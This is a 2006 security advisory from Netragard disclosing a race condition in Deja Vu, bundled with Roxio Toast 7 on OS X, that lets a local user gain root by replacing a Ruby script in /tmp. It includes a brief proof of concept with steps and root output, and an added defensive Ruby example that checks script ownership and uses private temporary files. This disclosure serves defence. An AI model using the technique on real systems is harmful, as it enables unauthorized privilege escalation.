******************** Netragard, L.L.C Advisory ********************
                              09/11/2006
                     Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are fortified
by continual vulnerability research and development. This ongoing
research, which is performed by our Strategic Reconnaissance Team,
specifically focuses on Operating Systems and Applications commonly used
by businesses internationally. We apply the knowledge gained by
performing this research to our professional security services. This in
turn enables us to produce high quality deliverables that are the product
of talented security professionals and not those of automated scanners
and tools. This advisory is the product of research done by the
Strategic Reconnaissance Team.

[ For more information please visit http://www.netragard.com ]

[Advisory Information]
----------------------------------------------------------------------
Contact               : Adriel T. Desautels
Advisory ID           : NETRAGARD-20060624
Product Name          : Roxio Toast
Product Version       : 7 Titanium
Vendor Name           : Roxio
Type of Vulnerability : Local Root Compromise
Effort                : Difficult, depends on timing.
Operating System      : OSX
Other                 : Race condition exploitation in Deja Vu, which is
                        bundled with Roxio Toast. Deja Vu is a product of
                        Propaganda Productions.

[Product Description]
----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across multiple
discs; compress and copy DVD movies; add over 50 hours of music to an
audio DVD with on-screen TV menus, shuffle play, and rich Dolby Digital
sound; burn DivX files into DVDs. Do it all with the fastest and most
reliable burning software for the Mac OS - Toast."
--http://www.roxio.com--

[Technical Summary]
----------------------------------------------------------------------
Deja Vu, which is bundled with Roxio Toast 7, creates Ruby scripts in the
world-writable /tmp directory. These scripts contain commands which are
then executed with escalated (root) privileges. Because the script is
created under a predictable name and is owned by the unprivileged user,
a race condition exists between its creation and its execution which
makes it possible to execute arbitrary commands against the system or
gain root level access.

[Technical Details]
----------------------------------------------------------------------
This was tested using a configured version of Roxio Toast 7 Titanium.
(reproduction depends on timing)

######################################################################
#
# dejavu_manual.rb was created by user test
#
######################################################################

netragard-test> ls -al /tmp/dejavu_manual.rb
-rw-r--r--  1 test  wheel  32843 Jul  7 21:41 /tmp/dejavu_manual.rb

######################################################################
#
# The contents of dejavu_manual.rb
#
######################################################################

netragard-test> cat test.rb
#!/usr/bin/ruby
system '/usr/bin/id'

######################################################################
#
# 1) Open the System Preferences
# 2) Click on deja vu
# 3) Perform a manual backup.
# 4) Notice uid=0(root)
#
######################################################################

netragard-test> /Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences
uid=0(root) gid=501(test) groups=501(test), 81(appserveradm), 79(appserverusr), 80(admin)

[Proof Of Concept]
----------------------------------------------------------------------
Demonstrated above.

[Vendor Status]
----------------------------------------------------------------------
Propaganda Productions was notified by Sonic Solutions on behalf of
Netragard, L.L.C. on August 10th 2006. As of today Netragard has not
received any response from Propaganda Productions.
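The weakness described in the Technical Summary is the classic insecure
temporary file pattern: a privileged process executes a script that an
unprivileged user owns, sitting under a predictable name in a shared,
world-writable directory. The Ruby below is an added example written for
this advisory and is not code from Netragard, Roxio or Propaganda
Productions. It shows the two checks a privileged executor should make
before running such a script (ownership and placement) and the hardened
alternative (a private 0700 directory with an exclusively created file).
The function names, the "dejavu-" prefix and the constructed sample
layout are assumptions for illustration only.

```ruby
require 'tmpdir'
require 'fileutils'

# Returns a list of problems found with +path+; an empty list means the
# file is acceptable for a process running as +expected_uid+ to execute.
# The checks mirror the advisory's conditions: the script lived in
# world-writable /tmp, was owned by an unprivileged user, and was run as
# root. lstat is used so a planted symlink is reported, not followed.
def script_safety_problems(path, expected_uid = Process.euid)
  problems = []
  st = File.lstat(path)
  problems << "is a symlink" if st.symlink?
  problems << "not a regular file" unless st.file?
  problems << "owned by uid #{st.uid}, expected #{expected_uid}" if st.uid != expected_uid
  if (st.mode & 0022) != 0
    problems << format("writable by group or others (mode %o)", st.mode & 0777)
  end
  dir = File.dirname(path)
  dir_st = File.stat(dir)
  problems << "directory #{dir} is world-writable" if (dir_st.mode & 0002) != 0
  problems
rescue Errno::ENOENT
  ["does not exist"]
end

# Hardened alternative to writing a predictable name into /tmp: a fresh
# private directory (Dir.mktmpdir creates it 0700 with a random suffix)
# and a script opened with O_EXCL so that creation fails, rather than
# silently reusing a file, if anything already sits at that path.
def write_private_script(contents, prefix = "dejavu-")
  dir = Dir.mktmpdir(prefix)
  path = File.join(dir, "job.rb")
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0600) do |f|
    f.write(contents)
  end
  path
end

# Builds a constructed layout resembling the advisory's finding: a sticky,
# world-writable directory (like /tmp) holding a 0644 script, then reports
# what a root executor (uid 0) should object to before running it.
def demo_unsafe_layout
  Dir.mktmpdir("shared-") do |shared|
    File.chmod(01777, shared)
    path = File.join(shared, "dejavu_manual.rb")
    File.write(path, "#!/usr/bin/ruby\nsystem '/usr/bin/id'\n")
    File.chmod(0644, path)
    return script_safety_problems(path, 0)
  end
end

if __FILE__ == $0
  puts "unsafe layout problems: #{demo_unsafe_layout.inspect}"
  safe = write_private_script("#!/usr/bin/ruby\nputs 'backup job'\n")
  puts "private script problems: #{script_safety_problems(safe).inspect}"
  FileUtils.rm_rf(File.dirname(safe))
end
```

The ownership check is the one that directly addresses this advisory: a
script the privileged backup helper is about to run should be owned by
the uid it runs as, never by the interactive user, and it should never
be looked up in a directory that other local users can write to.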
[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.